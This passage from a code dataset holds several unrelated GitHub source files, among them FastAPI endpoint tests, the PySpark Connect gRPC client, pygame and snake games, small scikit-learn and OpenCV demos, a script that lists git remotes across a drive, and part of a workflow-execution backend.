test_update_nonexistent(example_update_monitor):\n nonexistent_id = '12345678'\n\n client = TestClient(app)\n response = client.put(\n f'/monitors/v1/{nonexistent_id}', json=example_update_monitor)\n\n assert response.status_code == 404\n assert response.json()['detail'] == f\"Monitor {nonexistent_id} not found\"\n\n\ndef test_update(example_monitor, example_monitor_id, example_update_monitor):\n db = mongo_test_client[MONGO_DB_NAME]\n collection = db[MONITORS_COLLECTION_NAME]\n collection.insert_one(example_monitor)\n\n client = TestClient(app)\n\n response = client.put(\n f'/monitors/v1/{example_monitor_id}', json=example_update_monitor)\n\n assert response.status_code == 200\n\n result = response.json()\n\n for field in example_update_monitor:\n assert result[field] == (\n example_monitor[field] if example_update_monitor[field] is None else example_update_monitor[field])\n\n\ndef test_id_not_found(example_monitor_id):\n client = TestClient(app)\n response = client.get(f'/monitors/v1/{example_monitor_id}')\n\n assert response.status_code == 404\n assert response.json()[\n 'detail'] == f\"Monitor {example_monitor_id} not found\"\n\n\ndef test_get_monitors_empty():\n client = TestClient(app)\n response = client.get('/monitors/v1/getmonitors/false')\n\n assert response.status_code == 200\n assert response.json() == []\n\n\ndef test_create_monitor(example_monitor):\n del example_monitor['id']\n del example_monitor['results']\n\n client = TestClient(app)\n response = client.post(\n f'/monitors/v1', json=json.loads(json.dumps(example_monitor, default=str)))\n\n assert response.status_code == 201\n\n result = response.json()\n\n for field in example_monitor:\n assert result[field] == example_monitor[field]\n\n\ndef test_get_monitor(example_monitor, example_monitor_id):\n db = mongo_test_client[MONGO_DB_NAME]\n collection = db[MONITORS_COLLECTION_NAME]\n collection.insert_one(example_monitor)\n\n client = TestClient(app)\n\n response = client.get(f'/monitors/v1/{example_monitor_id}')\n\n assert response.status_code == 200\n assert response.json()['_id'] == example_monitor_id\n\n\ndef test_delete_monitor(example_monitor, example_monitor_id):\n db = mongo_test_client[MONGO_DB_NAME]\n collection = db[MONITORS_COLLECTION_NAME]\n collection.insert_one(example_monitor)\n\n client = TestClient(app)\n\n response = client.delete(f'/monitors/v1/{example_monitor_id}')\n\n assert response.status_code == 204\n","repo_name":"EASS-HIT-PART-A-2022-CLASS-III/Monitorman","sub_path":"backend/tests/test_backend.py","file_name":"test_backend.py","file_ext":"py","file_size_in_byte":4848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25466536085","text":"import os\nimport urllib.parse\nimport uuid\nfrom typing import Iterable, Optional, Any, Union, List, Tuple, Dict\n\nimport grpc\nimport pandas\nimport pyarrow as pa\n\nimport pyspark.sql.connect.proto as pb2\nimport pyspark.sql.connect.proto.base_pb2_grpc as grpc_lib\nimport pyspark.sql.connect.types as types\nimport pyspark.sql.types\nfrom pyspark import cloudpickle\nfrom pyspark.sql.types import (\n DataType,\n StructType,\n StructField,\n)\n\n\nclass ChannelBuilder:\n \"\"\"\n This is a helper class that is used to create a GRPC channel based on the given\n connection string per the documentation of Spark Connect.\n\n .. versionadded:: 3.4.0\n\n Examples\n --------\n >>> cb = ChannelBuilder(\"sc://localhost\")\n ... 
cb.endpoint\n \"localhost:15002\"\n\n >>> cb = ChannelBuilder(\"sc://localhost/;use_ssl=true;token=aaa\")\n ... cb.secure\n True\n \"\"\"\n\n PARAM_USE_SSL = \"use_ssl\"\n PARAM_TOKEN = \"token\"\n PARAM_USER_ID = \"user_id\"\n\n DEFAULT_PORT = 15002\n\n def __init__(self, url: str) -> None:\n # Explicitly check the scheme of the URL.\n if url[:5] != \"sc://\":\n raise AttributeError(\"URL scheme must be set to `sc`.\")\n # Rewrite the URL to use http as the scheme so that we can leverage\n # Python's built-in parser.\n tmp_url = \"http\" + url[2:]\n self.url = urllib.parse.urlparse(tmp_url)\n self.params: Dict[str, str] = {}\n if len(self.url.path) > 0 and self.url.path != \"/\":\n raise AttributeError(\n f\"Path component for connection URI must be empty: {self.url.path}\"\n )\n self._extract_attributes()\n\n def _extract_attributes(self) -> None:\n if len(self.url.params) > 0:\n parts = self.url.params.split(\";\")\n for p in parts:\n kv = p.split(\"=\")\n if len(kv) != 2:\n raise AttributeError(f\"Parameter '{p}' is not a valid parameter key-value pair\")\n self.params[kv[0]] = urllib.parse.unquote(kv[1])\n\n netloc = self.url.netloc.split(\":\")\n if len(netloc) == 1:\n self.host = netloc[0]\n self.port = ChannelBuilder.DEFAULT_PORT\n elif len(netloc) == 2:\n self.host = netloc[0]\n self.port = int(netloc[1])\n else:\n raise AttributeError(\n f\"Target destination {self.url.netloc} does not match ':' pattern\"\n )\n\n def metadata(self) -> Iterable[Tuple[str, str]]:\n \"\"\"\n Builds the GRPC specific metadata list to be injected into the request. All\n parameters will be converted to metadata except ones that are explicitly used\n by the channel.\n\n Returns\n -------\n A list of tuples (key, value)\n \"\"\"\n return [\n (k, self.params[k])\n for k in self.params\n if k\n not in [\n ChannelBuilder.PARAM_TOKEN,\n ChannelBuilder.PARAM_USE_SSL,\n ChannelBuilder.PARAM_USER_ID,\n ]\n ]\n\n @property\n def secure(self) -> bool:\n if self._token is not None:\n return True\n\n value = self.params.get(ChannelBuilder.PARAM_USE_SSL, \"\")\n return value.lower() == \"true\"\n\n @property\n def endpoint(self) -> str:\n return f\"{self.host}:{self.port}\"\n\n @property\n def _token(self) -> Optional[str]:\n return self.params.get(ChannelBuilder.PARAM_TOKEN, None)\n\n @property\n def userId(self) -> Optional[str]:\n \"\"\"\n Returns\n -------\n The user_id extracted from the parameters of the connection string or `None` if not\n specified.\n \"\"\"\n return self.params.get(ChannelBuilder.PARAM_USER_ID, None)\n\n def get(self, key: str) -> Any:\n \"\"\"\n Parameters\n ----------\n key : str\n Parameter key name.\n\n Returns\n -------\n The parameter value if present, raises exception otherwise.\n \"\"\"\n return self.params[key]\n\n def toChannel(self) -> grpc.Channel:\n \"\"\"\n Applies the parameters of the connection string and creates a new\n GRPC channel according to the configuration.\n\n Returns\n -------\n GRPC Channel instance.\n \"\"\"\n destination = f\"{self.host}:{self.port}\"\n\n # Setting a token implicitly sets the `use_ssl` to True.\n if not self.secure and self._token is not None:\n use_secure = True\n elif self.secure:\n use_secure = True\n else:\n use_secure = False\n\n if not use_secure:\n return grpc.insecure_channel(destination)\n else:\n # Default SSL Credentials.\n opt_token = self.params.get(ChannelBuilder.PARAM_TOKEN, None)\n # When a token is present, pass the token to the channel.\n if opt_token is not None:\n ssl_creds = grpc.ssl_channel_credentials()\n composite_creds 
= grpc.composite_channel_credentials(\n ssl_creds, grpc.access_token_call_credentials(opt_token)\n )\n return grpc.secure_channel(destination, credentials=composite_creds)\n else:\n return grpc.secure_channel(destination, credentials=grpc.ssl_channel_credentials())\n\n\nclass MetricValue:\n def __init__(self, name: str, value: Union[int, float], type: str):\n self._name = name\n self._type = type\n self._value = value\n\n def __repr__(self) -> str:\n return f\"<{self._name}={self._value} ({self._type})>\"\n\n @property\n def name(self) -> str:\n return self._name\n\n @property\n def value(self) -> Union[int, float]:\n return self._value\n\n @property\n def metric_type(self) -> str:\n return self._type\n\n\nclass PlanMetrics:\n def __init__(self, name: str, id: int, parent: int, metrics: List[MetricValue]):\n self._name = name\n self._id = id\n self._parent_id = parent\n self._metrics = metrics\n\n def __repr__(self) -> str:\n return f\"Plan({self._name})={self._metrics}\"\n\n @property\n def name(self) -> str:\n return self._name\n\n @property\n def plan_id(self) -> int:\n return self._id\n\n @property\n def parent_plan_id(self) -> int:\n return self._parent_id\n\n @property\n def metrics(self) -> List[MetricValue]:\n return self._metrics\n\n\nclass AnalyzeResult:\n def __init__(\n self,\n schema: pb2.DataType,\n explain: str,\n tree_string: str,\n is_local: bool,\n is_streaming: bool,\n input_files: List[str],\n ):\n self.schema = schema\n self.explain_string = explain\n self.tree_string = tree_string\n self.is_local = is_local\n self.is_streaming = is_streaming\n self.input_files = input_files\n\n @classmethod\n def fromProto(cls, pb: Any) -> \"AnalyzeResult\":\n return AnalyzeResult(\n pb.schema,\n pb.explain_string,\n pb.tree_string,\n pb.is_local,\n pb.is_streaming,\n pb.input_files,\n )\n\n\nclass SparkConnectClient(object):\n \"\"\"Conceptually the remote spark session that communicates with the server\"\"\"\n\n def __init__(self, connectionString: str, userId: Optional[str] = None):\n \"\"\"\n Creates a new SparkSession for the Spark Connect interface.\n\n Parameters\n ----------\n connectionString: Optional[str]\n Connection string that is used to extract the connection parameters and configure\n the GRPC connection. Defaults to `sc://localhost`.\n userId : Optional[str]\n Optional unique user ID that is used to differentiate multiple users and\n isolate their Spark Sessions. If the `user_id` is not set, will default to\n the $USER environment. Defining the user ID as part of the connection string\n takes precedence.\n \"\"\"\n # Parse the connection string.\n self._builder = ChannelBuilder(connectionString)\n self._user_id = None\n if self._builder.userId is not None:\n self._user_id = self._builder.userId\n elif userId is not None:\n self._user_id = userId\n else:\n self._user_id = os.getenv(\"USER\", None)\n\n self._channel = self._builder.toChannel()\n self._stub = grpc_lib.SparkConnectServiceStub(self._channel)\n\n def register_udf(\n self, function: Any, return_type: Union[str, pyspark.sql.types.DataType]\n ) -> str:\n \"\"\"Create a temporary UDF in the session catalog on the other side. 
We generate a\n temporary name for it.\"\"\"\n name = f\"fun_{uuid.uuid4().hex}\"\n fun = pb2.CreateScalarFunction()\n fun.parts.append(name)\n fun.serialized_function = cloudpickle.dumps((function, return_type))\n\n req = self._execute_plan_request_with_metadata()\n req.plan.command.create_function.CopyFrom(fun)\n\n self._execute(req)\n return name\n\n def _build_metrics(self, metrics: \"pb2.ExecutePlanResponse.Metrics\") -> List[PlanMetrics]:\n return [\n PlanMetrics(\n x.name,\n x.plan_id,\n x.parent,\n [MetricValue(k, v.value, v.metric_type) for k, v in x.execution_metrics.items()],\n )\n for x in metrics.metrics\n ]\n\n def _to_pandas(self, plan: pb2.Plan) -> \"pandas.DataFrame\":\n req = self._execute_plan_request_with_metadata()\n req.plan.CopyFrom(plan)\n return self._execute_and_fetch(req)\n\n def _proto_schema_to_pyspark_schema(self, schema: pb2.DataType) -> DataType:\n return types.proto_schema_to_pyspark_data_type(schema)\n\n def schema(self, plan: pb2.Plan) -> StructType:\n proto_schema = self._analyze(plan).schema\n # Server side should populate the struct field which is the schema.\n assert proto_schema.HasField(\"struct\")\n\n fields = [\n StructField(\n f.name,\n self._proto_schema_to_pyspark_schema(f.data_type),\n f.nullable,\n )\n for f in proto_schema.struct.fields\n ]\n return StructType(fields)\n\n def explain_string(self, plan: pb2.Plan, explain_mode: str = \"extended\") -> str:\n result = self._analyze(plan, explain_mode)\n return result.explain_string\n\n def execute_command(self, command: pb2.Command) -> None:\n req = self._execute_plan_request_with_metadata()\n if self._user_id:\n req.user_context.user_id = self._user_id\n req.plan.command.CopyFrom(command)\n self._execute(req)\n return\n\n def _execute_plan_request_with_metadata(self) -> pb2.ExecutePlanRequest:\n req = pb2.ExecutePlanRequest()\n req.client_type = \"_SPARK_CONNECT_PYTHON\"\n if self._user_id:\n req.user_context.user_id = self._user_id\n return req\n\n def _analyze_plan_request_with_metadata(self) -> pb2.AnalyzePlanRequest:\n req = pb2.AnalyzePlanRequest()\n req.client_type = \"_SPARK_CONNECT_PYTHON\"\n if self._user_id:\n req.user_context.user_id = self._user_id\n return req\n\n def _analyze(self, plan: pb2.Plan, explain_mode: str = \"extended\") -> AnalyzeResult:\n req = self._analyze_plan_request_with_metadata()\n req.plan.CopyFrom(plan)\n if explain_mode not in [\"simple\", \"extended\", \"codegen\", \"cost\", \"formatted\"]:\n raise ValueError(\n f\"\"\"\n Unknown explain mode: {explain_mode}. 
Accepted \"\n \"explain modes are 'simple', 'extended', 'codegen', 'cost', 'formatted'.\"\n \"\"\"\n )\n if explain_mode == \"simple\":\n req.explain.explain_mode = pb2.Explain.ExplainMode.SIMPLE\n elif explain_mode == \"extended\":\n req.explain.explain_mode = pb2.Explain.ExplainMode.EXTENDED\n elif explain_mode == \"cost\":\n req.explain.explain_mode = pb2.Explain.ExplainMode.COST\n elif explain_mode == \"codegen\":\n req.explain.explain_mode = pb2.Explain.ExplainMode.CODEGEN\n else: # formatted\n req.explain.explain_mode = pb2.Explain.ExplainMode.FORMATTED\n\n resp = self._stub.AnalyzePlan(req, metadata=self._builder.metadata())\n return AnalyzeResult.fromProto(resp)\n\n def _process_batch(self, arrow_batch: pb2.ExecutePlanResponse.ArrowBatch) -> \"pandas.DataFrame\":\n with pa.ipc.open_stream(arrow_batch.data) as rd:\n return rd.read_pandas()\n\n def _execute(self, req: pb2.ExecutePlanRequest) -> None:\n for b in self._stub.ExecutePlan(req, metadata=self._builder.metadata()):\n continue\n return\n\n def _execute_and_fetch(self, req: pb2.ExecutePlanRequest) -> \"pandas.DataFrame\":\n import pandas as pd\n\n m: Optional[pb2.ExecutePlanResponse.Metrics] = None\n result_dfs = []\n\n for b in self._stub.ExecutePlan(req, metadata=self._builder.metadata()):\n if b.metrics is not None:\n m = b.metrics\n if b.HasField(\"arrow_batch\"):\n pb = self._process_batch(b.arrow_batch)\n result_dfs.append(pb)\n\n assert len(result_dfs) > 0\n\n df = pd.concat(result_dfs)\n\n # pd.concat generates non-consecutive index like:\n # Int64Index([0, 1, 0, 1, 2, 0, 1, 0, 1, 2], dtype='int64')\n # set it to RangeIndex to be consistent with pyspark\n n = len(df)\n df.set_index(pd.RangeIndex(start=0, stop=n, step=1), inplace=True)\n\n # Attach the metrics to the DataFrame attributes.\n if m is not None:\n df.attrs[\"metrics\"] = self._build_metrics(m)\n return df\n","repo_name":"ep-infosec/33_apache_spark","sub_path":"python/pyspark/sql/connect/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":13839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72667296892","text":"import pygame\nfrom random import *\n\nfrom telas.Tela_menu import Tela_menu\nfrom telas.Tela_vitoria import Tela_vitoria\nfrom telas.Tela_derrota import Tela_derrota\nfrom telas.Tela_final import Tela_final\nfrom fases.Fase import *\n\nfrom info_fases import info_fases\nfrom multiuso import *\n\n\nclass Jogo:\n def __init__(self):\n pygame.init()\n pygame.mixer.init()\n self.screen = pygame.display.set_mode((WIDTH, HEIGHT))\n pygame.display.set_caption(\"Ao infinito e além!\")\n \n self.nivel_atual = 4\n self.tela_atual = Tela_menu(self.nivel_atual)\n self.clock = pygame.time.Clock()\n self.fps = 60\n self.fonte = pygame.font.SysFont('Anton', 50)\n self.som_ganhou = pygame.mixer.Sound('Assets/efeitos_sonoros/ganhou.mp3')\n self.som_perdeu = pygame.mixer.Sound('Assets/efeitos_sonoros/perdeu.mp3')\n \n \n def atualiza(self):\n\n self.tela_atual = self.tela_atual.atualiza()\n self.clock.tick(self.fps)\n\n if self.tela_atual is None:\n return False\n \n elif self.tela_atual == \"vitoria\":\n fase_atual, proxima_fase = vitoria(self.nivel_atual)\n self.tela_atual = Tela_vitoria(fase_atual, proxima_fase)\n pygame.mixer.Sound.play(self.som_ganhou)\n \n elif self.tela_atual == \"final\":\n fase_atual = criar_fase(self.nivel_atual)\n self.tela_atual = Tela_final(fase_atual)\n pygame.mixer.Sound.play(self.som_ganhou)\n\n elif self.tela_atual == \"derrota\":\n fase_atual = 
criar_fase(self.nivel_atual)\n self.tela_atual = Tela_derrota(fase_atual)\n pygame.mixer.Sound.play(self.som_perdeu)\n\n elif self.tela_atual == \"menu\":\n self.tela_atual = Tela_menu(self.nivel_atual)\n \n\n if type(self.tela_atual) is Fase:\n self.nivel_atual = self.tela_atual.nivel\n\n return True\n\n def game_loop(self):\n while self.atualiza():\n self.tela_atual.desenha(self.screen, self.fonte)\n pygame.display.update()\n \n def finaliza(self):\n pygame.quit()","repo_name":"Isabelleatt/ao_infinito_e_alem","sub_path":"Jogo.py","file_name":"Jogo.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31206874900","text":"import pandas as pd\nimport numpy as np\nimport matplotlib as plt\nfrom datetime import datetime\nstartTime = datetime.now()\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.tree import DecisionTreeClassifier\n\n\ndf = pd.read_csv('Data//IrisDataSet.csv', sep=',')\n#df = pd.read_csv('Data//SampleXTXData.csv', sep=',')\n\nprint(df.describe())\n#print(df.dtypes)\n\ndf.fillna(0, inplace=True)\n\nall_inputs = df[['sepal_length', 'sepal_width', 'petal_length', 'petal_width']].values\nall_classes = df['species'].values\n\n#all_inputs = df[['askRate0','askRate1','askRate2','askRate3','askRate4','askRate5',\\\n# 'askRate6','askRate7','askRate8','askRate9','askRate10','askRate11','askRate12',\\\n# 'askRate13','askRate14','askSize0','askSize1','askSize2','askSize3','askSize4',\\\n# 'askSize5','askSize6','askSize7','askSize8','askSize9','askSize10','askSize11',\\\n# 'askSize12','askSize13','askSize14','bidRate0','bidRate1','bidRate2','bidRate3',\\\n# 'bidRate4','bidRate5','bidRate6','bidRate7','bidRate8','bidRate9','bidRate10',\\\n# 'bidRate11','bidRate12','bidRate13','bidRate14','bidSize0','bidSize1','bidSize2',\\\n# 'bidSize3','bidSize4','bidSize5','bidSize6','bidSize7','bidSize8','bidSize9','bidSize10',\\\n# 'bidSize11','bidSize12','bidSize13','bidSize14']].values\n#all_classes = df['y'].values\n\n\n(train_inputs, test_inputs, train_classes, test_classes) =\\\n train_test_split(all_inputs, all_classes, train_size=0.7, random_state=1)\n\nestimator = DecisionTreeClassifier(criterion='entropy', max_leaf_nodes=3)\nestimator.fit(train_inputs, train_classes)\n\nprint(\"Accuracy: \", estimator.score(test_inputs, test_classes))\nprint(\"--------------------\")\ntreeStructure()\nprint(\"--------------------\")\nprint(datetime.now() - startTime)\n\n","repo_name":"mrodriguez1212/XTXChallenge","sub_path":"ML_Algos_Test/Example_DT_Class.py","file_name":"Example_DT_Class.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"44661425","text":"import cv2\nimport numpy as np\n\nimg = cv2.imread('1.jpg')\nheight, width = img.shape[:2]\n\nrotation_matrix = cv2.getRotationMatrix2D((height/4, width/4),90, 1)\nrotation_image = cv2.warpAffine(img, rotation_matrix, (width, height))\n\ncv2.imshow('Original', img)\ncv2.imshow('Rotation', rotation_image)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"manthan-ladva/Language-Practice","sub_path":"Python/OpenCV Hindi YouTube/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74331763453","text":"import pygame as py\r\nimport math\r\nimport random as rand\r\nimport pickle as pic\r\n\r\ndef addsnbody():\r\n 
snbod.append(py.Vector2((800,800)))\r\n\r\npy.init()\r\npy.font.init()\r\nmyfont = py.font.SysFont('Comic Sans MS', 15)\r\nrunning = True\r\nscreenh=500\r\nscreenw=500\r\nscreen=py.display.set_mode((screenw,screenh),vsync=0)\r\nsnbod=[]\r\nsnbod.append(py.Vector2())\r\nsnbod[0].x=screenh/2\r\nsnbod[0].y=screenw/2\r\nspeed=12\r\ndir=0\r\nfps=25\r\nfpsclock=py.time.Clock()\r\nsnsize=12\r\nupturn=False\r\nlefturn=True\r\nctr=0\r\nt=()\r\nfcounter=0\r\nappsize=7.5\r\naploc=py.Vector2(800,800)\r\ngameover=False\r\npy.display.set_caption('SNAKEGAME')\r\n\r\n\r\ntry:\r\n f=open(\"sg.bin\",\"rb\")\r\n r=pic.load(f)\r\n hiscore=r[0]\r\n f.close()\r\n \r\nexcept FileNotFoundError:\r\n f=open(\"sg.bin\",\"wb\")\r\n hiscore=0\r\n \r\n f.close\r\n\r\n\r\nwhile True:\r\n \r\n if not gameover:\r\n for event in py.event.get():\r\n if event.type==py.QUIT:\r\n if ctr>hiscore:\r\n f=open(\"sg.bin\",\"wb\")\r\n hiscore=ctr\r\n r=[]\r\n r.append(hiscore)\r\n pic.dump(r,f)\r\n f.close()\r\n py.quit()\r\n\r\n if event.type == py.KEYDOWN:\r\n if event.key == py.K_UP and upturn:\r\n dir=0\r\n lefturn=True\r\n upturn=False\r\n if event.key == py.K_DOWN and upturn:\r\n dir=1\r\n lefturn=True\r\n upturn=False\r\n if event.key == py.K_LEFT and lefturn:\r\n dir=2\r\n lefturn=False\r\n upturn=True\r\n if event.key == py.K_RIGHT and lefturn:\r\n dir=3\r\n lefturn=False\r\n upturn=True\r\n \r\n if ctr>=0:\r\n t=()\r\n for i in range(0,ctr+1):\r\n x=snbod[i].x\r\n y=snbod[i].y\r\n t+=(py.Vector2((x,y)),)\r\n for i in range(0,ctr+1):\r\n\r\n if i==0:\r\n continue\r\n snbod[i]=t[i-1]\r\n\r\n if fcounter>75:\r\n aploc=py.Vector2(((rand.randint(10,490)),(rand.randint(10,490))))\r\n fcounter=0 \r\n\r\n if dir==0:\r\n snbod[0].y-=speed\r\n if dir==1:\r\n snbod[0].y+=speed\r\n if dir==2:\r\n snbod[0].x-=speed\r\n if dir==3:\r\n snbod[0].x+=speed\r\n\r\n if snbod[0].x> screenw:\r\n snbod[0].x=0\r\n if snbod[0].y>screenh:\r\n snbod[0].y=0\r\n if snbod[0].x<0:\r\n snbod[0].x=screenw\r\n if snbod[0].y<0:\r\n snbod[0].y=screenh\r\n\r\n screen.fill((211,211,211))\r\n screen.blit(myfont.render(\"Score =\"+str(ctr), False, (218,165,32)), (5, 10))\r\n screen.blit(myfont.render(\"HIScore =\"+str(hiscore), False, (218,165,32)), (5, 40))\r\n \r\n if (snbod[0].x < (aploc.x + appsize) and ((snbod[0].x + snsize) > aploc.x) and (snbod[0].y < (aploc.y + appsize) and (snbod[0].y +snsize) >aploc.y)):\r\n ctr+=1\r\n aploc=py.Vector2(((rand.randint(10,490)),(rand.randint(10,490))))\r\n addsnbody()\r\n py.draw.rect(screen,(0,150,0),(snbod[0].x,snbod[0].y,snsize,snsize))\r\n if ctr!=0:\r\n for i in range(1,ctr+1):\r\n py.draw.rect(screen,(0,255,0),(snbod[i].x,snbod[i].y,snsize,snsize))\r\n py.draw.rect(screen,(255,0,0),(aploc.x,aploc.y,appsize,appsize))\r\n py.display.flip()\r\n\r\n \r\n\r\n for i in range(1,len(snbod)):\r\n if snbod[0]==snbod[i]:\r\n \r\n gameover=True\r\n break\r\n else:\r\n \r\n if ctr>hiscore:\r\n f=open(\"sg.bin\",\"wb\")\r\n hiscore=ctr\r\n r=[]\r\n r.append(hiscore)\r\n pic.dump(r,f)\r\n f.close()\r\n for event in py.event.get():\r\n screen.blit(myfont.render(\"Yuo Ded NOOB\", False, (150,0,0)), (175, 250))\r\n screen.blit(myfont.render(\"Press enter to restart\", False, (150,0,0)), (175, 290))\r\n if event.type==py.QUIT:\r\n if ctr>hiscore:\r\n f=open(\"sg.bin\",\"wb\")\r\n hiscore=ctr\r\n r=[]\r\n r.append(hiscore)\r\n pic.dump(r,f)\r\n f.close()\r\n py.quit()\r\n\r\n if event.type == py.KEYDOWN:\r\n if event.key == py.K_RETURN:\r\n snbod=[]\r\n snbod.append(py.Vector2((screenw/2,screenw/2)))\r\n ctr=0\r\n dir=0\r\n 
upturn=False\r\n lefturn=True\r\n gameover=False\r\n py.display.update()\r\n fpsclock.tick(fps)\r\n fcounter+=1 \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"yiungyiung/pygame-snakeggame","sub_path":"pysngame/snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":4878,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"5629122948","text":"\"\"\"\nThis code goes through every existing file on the mentioned drive and checks for git repositories, and when it finds a repository,\nit runs git remote -v and prints the output onto a output.txt file.\n\nNOTE: change {ENTER_DRIVE_NAME_HERE} to your drive name.\n\"\"\"\n\n\nimport os\nimport subprocess\n# Directory to start searching from\nroot_dir = '{ENTER_DRIVE_NAME_HERE}:\\\\'\n# Search for .git folders\ngit_dirs = []\nfor dirpath, dirnames, filenames in os.walk(root_dir):\n if '.git' in dirnames:\n git_dirs.append(os.path.join(dirpath, '.git'))\n print(f\"Searching {dirpath}...\")\n# Execute command for each git directory\nfor git_dir in git_dirs:\n try:\n # Get parent directory of .git folder\n parent_dir = os.path.abspath(os.path.join(git_dir, os.pardir))\n \n # Add parent directory to safe directories\n subprocess.run(['git', 'config', '--global', '--add', 'safe.directory', parent_dir], check=True)\n \n # Run git remote command and save output to file\n output = subprocess.check_output(['git', '-C', parent_dir, 'remote', '-v'])\n with open('output.txt', 'a') as f:\n f.write(f\"\\n\\n{parent_dir}:\\n{output.decode()}\")\n except subprocess.CalledProcessError as e:\n print(f\"Error while executing command for {parent_dir}: {e}\")\n except Exception as e:\n print(f\"Error while processing {parent_dir}: {e}\")\n","repo_name":"captainion2119/py-utilities","sub_path":"Git-remote-search/git-search.py","file_name":"git-search.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17298256872","text":"\"\"\"Handle execution of transformation revisions.\"\"\"\n\nimport json\nimport logging\nfrom posixpath import join as posix_urljoin\nfrom uuid import UUID, uuid4\n\nimport httpx\nfrom pydantic import BaseModel, Field, ValidationError\n\nfrom hetdesrun.backend.models.info import ExecutionResponseFrontendDto\nfrom hetdesrun.models.component import ComponentNode\nfrom hetdesrun.models.run import (\n ConfigurationInput,\n PerformanceMeasuredStep,\n WorkflowExecutionInput,\n WorkflowExecutionResult,\n)\nfrom hetdesrun.models.wiring import WorkflowWiring\nfrom hetdesrun.models.workflow import WorkflowNode\nfrom hetdesrun.persistence.dbservice.exceptions import DBIntegrityError, DBNotFoundError\nfrom hetdesrun.persistence.dbservice.revision import (\n get_all_nested_transformation_revisions,\n read_single_transformation_revision,\n)\nfrom hetdesrun.persistence.models.transformation import TransformationRevision\nfrom hetdesrun.persistence.models.workflow import WorkflowContent\nfrom hetdesrun.runtime.logging import execution_context_filter\nfrom hetdesrun.runtime.service import runtime_service\nfrom hetdesrun.utils import Type\nfrom hetdesrun.webservice.auth_dependency import get_auth_headers\nfrom hetdesrun.webservice.auth_outgoing import ServiceAuthenticationError\nfrom hetdesrun.webservice.config import get_config\n\nlogger = logging.getLogger(__name__)\nlogger.addFilter(execution_context_filter)\n\n\nclass ExecByIdInput(BaseModel):\n id: UUID # noqa: A003\n wiring: 
WorkflowWiring | None = Field(\n None,\n description=\"The wiring to be used. \"\n \"If no wiring is provided the stored test wiring will be used.\",\n )\n run_pure_plot_operators: bool = Field(\n False, description=\"Whether pure plot components should be run.\"\n )\n job_id: UUID = Field(\n default_factory=uuid4,\n description=(\n \"Id to identify an individual execution job, \"\n \"will be generated if it is not provided.\"\n ),\n )\n\n\nclass ExecLatestByGroupIdInput(BaseModel):\n \"\"\"Payload for execute-latest kafka endpoint\n\n WARNING: Even when this input is not changed, the execution response might change if a new\n latest transformation revision exists.\n\n WARNING: The inputs and outputs may be different for different revisions. In such a case,\n executing the last revision with the same input as before will not work, but will result in\n errors.\n\n The latest transformation will be determined by the released_timestamp of the released revisions\n of the revision group which are stored in the database.\n\n This transformation will be loaded from the DB and executed with the wiring sent with this\n payload.\n \"\"\"\n\n revision_group_id: UUID\n wiring: WorkflowWiring\n run_pure_plot_operators: bool = Field(\n False, description=\"Whether pure plot components should be run.\"\n )\n job_id: UUID = Field(\n default_factory=uuid4,\n description=\"Optional job id, that can be used to track an execution job.\",\n )\n\n def to_exec_by_id(self, id: UUID) -> ExecByIdInput: # noqa: A002\n return ExecByIdInput(\n id=id,\n wiring=self.wiring,\n run_pure_plot_operators=self.run_pure_plot_operators,\n job_id=self.job_id,\n )\n\n\nclass TrafoExecutionError(Exception):\n pass\n\n\nclass TrafoExecutionNotFoundError(TrafoExecutionError):\n pass\n\n\nclass TrafoExecutionRuntimeConnectionError(TrafoExecutionError):\n pass\n\n\nclass TrafoExecutionResultValidationError(TrafoExecutionError):\n pass\n\n\ndef nested_nodes(\n tr_workflow: TransformationRevision,\n all_nested_tr: dict[UUID, TransformationRevision],\n) -> list[ComponentNode | WorkflowNode]:\n if tr_workflow.type != Type.WORKFLOW:\n raise ValueError\n\n assert isinstance( # noqa: S101\n tr_workflow.content, WorkflowContent\n ) # hint for mypy\n ancestor_operator_ids = [operator.id for operator in tr_workflow.content.operators]\n ancestor_children: dict[UUID, TransformationRevision] = {}\n for operator_id in ancestor_operator_ids:\n if operator_id in all_nested_tr:\n ancestor_children[operator_id] = all_nested_tr[operator_id]\n else:\n raise DBIntegrityError(\n f\"operator {operator_id} of transformation revision {tr_workflow.id} \"\n f\"not contained in result of get_all_nested_transformation_revisions\"\n )\n\n def children_nodes(\n workflow: WorkflowContent, tr_operators: dict[UUID, TransformationRevision]\n ) -> list[ComponentNode | WorkflowNode]:\n sub_nodes: list[ComponentNode | WorkflowNode] = []\n\n for operator in workflow.operators:\n if operator.type == Type.COMPONENT:\n sub_nodes.append(\n tr_operators[operator.id].to_component_node(\n operator.id, operator.name\n )\n )\n if operator.type == Type.WORKFLOW:\n tr_workflow = tr_operators[operator.id]\n assert isinstance( # noqa: S101\n tr_workflow.content, WorkflowContent\n ) # hint for mypy\n operator_ids = [\n operator.id for operator in tr_workflow.content.operators\n ]\n tr_children = {\n id_: all_nested_tr[id_]\n for id_ in operator_ids\n if id_ in all_nested_tr\n }\n sub_nodes.append(\n tr_workflow.content.to_workflow_node(\n 
